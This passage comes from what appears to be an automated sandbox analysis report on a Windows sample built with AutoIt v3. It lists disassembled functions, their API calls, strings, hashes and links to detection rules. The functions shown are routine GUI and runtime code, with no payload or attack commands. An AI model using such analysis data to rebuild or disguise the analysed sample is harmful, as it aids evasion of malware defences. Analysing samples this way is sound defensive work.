                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004244D2
                            • _wcscpy.LIBCMT ref: 00424500
                            • _wcscmp.LIBCMT ref: 0042450B
                            • _wcscat.LIBCMT ref: 00424521
                            • _wcsstr.LIBCMT ref: 0042452C
                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00424548
                            • _wcscat.LIBCMT ref: 00424591
                            • _wcscat.LIBCMT ref: 00424598
                            • _wcsncpy.LIBCMT ref: 004245C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                            • API String ID: 699586101-1459072770
                            • Opcode ID: d0a510dee4b2b6626f2dcceae83d800760ccd2c681a4bcc2d4b36e652687c439
                            • Instruction ID: ca316a4e60c237a8a2300981ed8e787530a8134c5587f51fecd9a0ae69c36a8c
                            • Opcode Fuzzy Hash: d0a510dee4b2b6626f2dcceae83d800760ccd2c681a4bcc2d4b36e652687c439
                            • Instruction Fuzzy Hash: 0641F931A402607BE715AB759C47FFF77ACDF82710F50016BF905EA1C2EA789A0186AD
                            Function 003C27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C28BC
                            • GetSystemMetrics.USER32(00000007), ref: 003C28C4
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C28EF
                            • GetSystemMetrics.USER32(00000008), ref: 003C28F7
                            • GetSystemMetrics.USER32(00000004), ref: 003C291C
                            • SetRect.USER32 ref: 003C2939
                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003C2949
                            • CreateWindowExW.USER32 ref: 003C297C
                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003C2990
                            • GetClientRect.USER32(00000000,000000FF), ref: 003C29AE
                            • GetStockObject.GDI32(00000011), ref: 003C29CA
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C29D5
                              • Part of subcall function 003C2344: GetCursorPos.USER32(?), ref: 003C2357
                              • Part of subcall function 003C2344: ScreenToClient.USER32(004857B0,?), ref: 003C2374
                              • Part of subcall function 003C2344: GetAsyncKeyState.USER32 ref: 003C2399
                              • Part of subcall function 003C2344: GetAsyncKeyState.USER32 ref: 003C23A7
                            • SetTimer.USER32(00000000,00000000,00000028,003C1256), ref: 003C29FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                            • String ID: AutoIt v3 GUI
                            • API String ID: 1458621304-248962490
                            • Opcode ID: a062dbd146ccfb21d00414eb746d54a47abbb70e37ab65bff9f5de57f332b3ce
                            • Instruction ID: 90d449577992112e9242cffa743892e95fd146c5e63f16fb541851d4e306f579
                            • Opcode Fuzzy Hash: a062dbd146ccfb21d00414eb746d54a47abbb70e37ab65bff9f5de57f332b3ce
                            • Instruction Fuzzy Hash: E2B16B75A4020AEFDB15EFA8CD45FAE7BB4FB08310F118129FA15E62A0DB74AC51CB54
                            Function 0044C5FE Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 181windowfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DragQueryPoint.SHELL32(?,?), ref: 0044C627
                              • Part of subcall function 0044AB37: ClientToScreen.USER32(?,?), ref: 0044AB60
                              • Part of subcall function 0044AB37: GetWindowRect.USER32(?,?), ref: 0044ABD6
                              • Part of subcall function 0044AB37: PtInRect.USER32(?,?,0044C014), ref: 0044ABE6
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0044C690
                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0044C69B
                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0044C6BE
                            • _wcscat.LIBCMT ref: 0044C6EE
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044C705
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0044C71E
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0044C735
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0044C757
                            • DragFinish.SHELL32(?), ref: 0044C75E
                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0044C851
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$`$$pbH
                            • API String ID: 169749273-3007670085
                            • Opcode ID: ee1db23c8cfbe94322094ed6938bb3415bad7bcae621176ba58a3f04471acd2c
                            • Instruction ID: d34a3086effc22a43aac5a3667caa0ed0be4d8d45f4a39ff778986eb04bc3528
                            • Opcode Fuzzy Hash: ee1db23c8cfbe94322094ed6938bb3415bad7bcae621176ba58a3f04471acd2c
                            • Instruction Fuzzy Hash: 6A618D71108300AFD701EF64CC85EAFBBE8EF89350F40492EF595971A1DB30AA49CB5A
                            Function 0041A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetClassNameW.USER32(?,?,00000100), ref: 0041A47A
                            • __swprintf.LIBCMT ref: 0041A51B
                            • _wcscmp.LIBCMT ref: 0041A52E
                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0041A583
                            • _wcscmp.LIBCMT ref: 0041A5BF
                            • GetClassNameW.USER32(?,?,00000400), ref: 0041A5F6
                            • GetDlgCtrlID.USER32 ref: 0041A648
                            • GetWindowRect.USER32(?,?), ref: 0041A67E
                            • GetParent.USER32(?), ref: 0041A69C
                            • ScreenToClient.USER32(00000000), ref: 0041A6A3
                            • GetClassNameW.USER32(?,?,00000100), ref: 0041A71D
                            • _wcscmp.LIBCMT ref: 0041A731
                            • GetWindowTextW.USER32(?,?,00000400), ref: 0041A757
                            • _wcscmp.LIBCMT ref: 0041A76B
                              • Part of subcall function 003E362C: _iswctype.LIBCMT ref: 003E3634
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                            • String ID: %s%u
                            • API String ID: 3744389584-679674701
                            • Opcode ID: fdfdc06d70323cf2874ce74cd5905841ab35c0a7ba9ade9e9bc9709e76bdc3cf
                            • Instruction ID: 2b731a7e13c7da1385d28671c907442fa676b1a158c821a2187b3d92be4fb5c8
                            • Opcode Fuzzy Hash: fdfdc06d70323cf2874ce74cd5905841ab35c0a7ba9ade9e9bc9709e76bdc3cf
                            • Instruction Fuzzy Hash: 2AA1D531205606AFD715DF60C884FEBB7E8FF44314F04452AF9A9C6290D738EAA5CB96
                            Function 0041AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                            Download Yara Rule
                            APIs
                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0041AF18
                            • _wcscmp.LIBCMT ref: 0041AF29
                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0041AF51
                            • CharUpperBuffW.USER32(?,00000000), ref: 0041AF6E
                            • _wcscmp.LIBCMT ref: 0041AF8C
                            • _wcsstr.LIBCMT ref: 0041AF9D
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0041AFD5
                            • _wcscmp.LIBCMT ref: 0041AFE5
                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0041B00C
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0041B055
                            • _wcscmp.LIBCMT ref: 0041B065
                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0041B08D
                            • GetWindowRect.USER32(00000004,?), ref: 0041B0F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                            • String ID: @$ThumbnailClass
                            • API String ID: 1788623398-1539354611
                            • Opcode ID: 303721a356feeabdee3d976d1494efaa517ce29b6ec2e548b113d5b85816663d
                            • Instruction ID: 25c99455ffcbbb0896d6783b1f0526e4b7c69376e8161bc827abd0d1baaa3987
                            • Opcode Fuzzy Hash: 303721a356feeabdee3d976d1494efaa517ce29b6ec2e548b113d5b85816663d
                            • Instruction Fuzzy Hash: 4F81B071108205AFDB01DF11C885FAB7BD8EF44354F04856AFD858A296DB38DD8ACBA5
                            Function 0044A1B9 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 0044A259
                            • DestroyWindow.USER32 ref: 0044A2D3
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • CreateWindowExW.USER32 ref: 0044A34D
                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0044A36F
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044A382
                            • DestroyWindow.USER32 ref: 0044A3A4
                            • CreateWindowExW.USER32 ref: 0044A3DB
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044A3F4
                            • GetDesktopWindow.USER32 ref: 0044A40D
                            • GetWindowRect.USER32(00000000), ref: 0044A414
                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0044A42C
                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0044A444
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                            • String ID: 0$`$$tooltips_class32
                            • API String ID: 1297703922-3731353549
                            • Opcode ID: 795d035a00b0324c2001af229d9dff48505e0b50bc4cea6d163810b640288a56
                            • Instruction ID: 3d732c1498c28a6ca063490b786ca43a7f1f7fa99791d60d2257d1dfbb81d103
                            • Opcode Fuzzy Hash: 795d035a00b0324c2001af229d9dff48505e0b50bc4cea6d163810b640288a56
                            • Instruction Fuzzy Hash: C9718C74180205AFE721DF28CC49F6B77E5FB89304F04492EF9858B2A0D778E916CB5A
                            Function 0041ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                            • API String ID: 1038674560-1810252412
                            • Opcode ID: ad9f81001bb0209c775f288a86f3eb8165bfe51fc10d84753d856f30552bd754
                            • Instruction ID: c98ffec6b0317c5fbe00fcf33dab0fbd16cd56505fc5e672da7a6eec1db7af17
                            • Opcode Fuzzy Hash: ad9f81001bb0209c775f288a86f3eb8165bfe51fc10d84753d856f30552bd754
                            • Instruction Fuzzy Hash: CC31C431A48205A6EA11EB60DE03FEF77649F10750F70412AF805B51D1FF696F54CA9A
                            Function 00434FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Cursor$Load$Info
                            • String ID:
                            • API String ID: 2577412497-0
                            • Opcode ID: a42e6e696ae16a204e04e367848ea64e1181d765039e175e084d9a01cf360371
                            • Instruction ID: 725743b9c4a15889a5b8a8cb005401039b314f610dd3cb2b00dffe3242b3df3d
                            • Opcode Fuzzy Hash: a42e6e696ae16a204e04e367848ea64e1181d765039e175e084d9a01cf360371
                            • Instruction Fuzzy Hash: 833101B1D08319AADF109FB68C8996FBFF8FB08750F50452BA51CE7280DA79A5008F95
                            Function 00444392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00444424
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044446F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                            • API String ID: 3974292440-4258414348
                            • Opcode ID: 18e791ecd8101226a6de991c051cdd108f8e55ac160c070287f5e95cf3ce01a4
                            • Instruction ID: 8bae61d8ffde8d5989cad73b57032cef83da74f30b2109a05d9b37ad9139f69d
                            • Opcode Fuzzy Hash: 18e791ecd8101226a6de991c051cdd108f8e55ac160c070287f5e95cf3ce01a4
                            • Instruction Fuzzy Hash: 3291A1702007019FDB05EF20C451B6EB7E1AF95354F05886EF8965B3A2CB38ED4ACB85
                            Function 0044C1AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 229windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • PostMessageW.USER32 ref: 0044C1FC
                            • GetFocus.USER32(?,?,?,?), ref: 0044C20C
                            • GetDlgCtrlID.USER32 ref: 0044C217
                            • _memset.LIBCMT ref: 0044C342
                            • GetMenuItemInfoW.USER32 ref: 0044C36D
                            • GetMenuItemCount.USER32(?), ref: 0044C38D
                            • GetMenuItemID.USER32(?,00000000), ref: 0044C3A0
                            • GetMenuItemInfoW.USER32 ref: 0044C3D4
                            • GetMenuItemInfoW.USER32 ref: 0044C41C
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0044C454
                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0044C489
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                            • String ID: 0$`$
                            • API String ID: 1296962147-1801689331
                            • Opcode ID: 49344ad4f6689b637191b28019e3f2b49a30b39e48562b7e5a45013e813a3341
                            • Instruction ID: d49a1f5f7ce5e88108eb1ae64cb09c582d417d6c536854effd43543011fbb96c
                            • Opcode Fuzzy Hash: 49344ad4f6689b637191b28019e3f2b49a30b39e48562b7e5a45013e813a3341
                            • Instruction Fuzzy Hash: 3181AE7060A301AFE750DF14C984A6BBBE8FB88314F08492EF99597391D774D905CBAA
                            Function 0044B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadImageW.USER32 ref: 0044B8B4
                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004491C2), ref: 0044B910
                            • LoadImageW.USER32 ref: 0044B949
                            • LoadImageW.USER32 ref: 0044B98C
                            • LoadImageW.USER32 ref: 0044B9C3
                            • FreeLibrary.KERNEL32(?), ref: 0044B9CF
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0044B9DF
                            • DestroyIcon.USER32(?,?,?,?,?,004491C2), ref: 0044B9EE
                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0044BA0B
                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0044BA17
                              • Part of subcall function 003E2EFD: __wcsicmp_l.LIBCMT ref: 003E2F86
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                            • String ID: .dll$.exe$.icl
                            • API String ID: 1212759294-1154884017
                            • Opcode ID: f8ac408bc0fe3d5bdba56c90d5f6431af103850ab6a7dba8c8f47dd0f8e1cc9a
                            • Instruction ID: 0ce6facc3b38aaeaeafbe107bd7ede6995223a3f9048171e53905fbce7b39545
                            • Opcode Fuzzy Hash: f8ac408bc0fe3d5bdba56c90d5f6431af103850ab6a7dba8c8f47dd0f8e1cc9a
                            • Instruction Fuzzy Hash: B3619CB1940215BAFB14DF64CC45FBB7BACEB08710F10421AF915DA1D0DB78E985DBA4
                            Function 003C201B Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 003C1B9A
                            • DestroyWindow.USER32 ref: 003C20D3
                            • KillTimer.USER32 ref: 003C216E
                            • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBCA6
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBCD7
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBCEE
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBD0A
                            • DeleteObject.GDI32(00000000), ref: 003FBD1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                            • String ID: `$
                            • API String ID: 641708696-74666722
                            • Opcode ID: f541f97a4e18ba5cfdf0ccadab60770501c18d72934c835de59f421e94619156
                            • Instruction ID: 541cdeeb4477c2ab8ee58f616f013ae6359afa684101970d72e2be6394909712
                            • Opcode Fuzzy Hash: f541f97a4e18ba5cfdf0ccadab60770501c18d72934c835de59f421e94619156
                            • Instruction Fuzzy Hash: EF61AA34100A14DFCB36AF14C948B2ABBF2FF41312F15883EE5428A970C774ACA5DB99
                            Function 0042A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • CharLowerBuffW.USER32(?,?), ref: 0042A3CB
                            • GetDriveTypeW.KERNEL32 ref: 0042A418
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A460
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A497
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A4C5
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 2698844021-4113822522
                            • Opcode ID: 23c1ffef003a5c2da22a7a1a430414f9b8302cdf136f5fefedb6b7d99aad1ed9
                            • Instruction ID: 5541ef7841fbe39bfc5458241635e77f1d7318742332696c4ec968ccd900d22b
                            • Opcode Fuzzy Hash: 23c1ffef003a5c2da22a7a1a430414f9b8302cdf136f5fefedb6b7d99aad1ed9
                            • Instruction Fuzzy Hash: 0D515C711043059FC701EF10C885E6AB3E4FF98718F50896EF88A9B261DB75ED0ACB56
                            Function 0041F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,003FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0041F8DF
                            • LoadStringW.USER32(00000000,?,003FE029,00000001), ref: 0041F8E8
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,003FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0041F90A
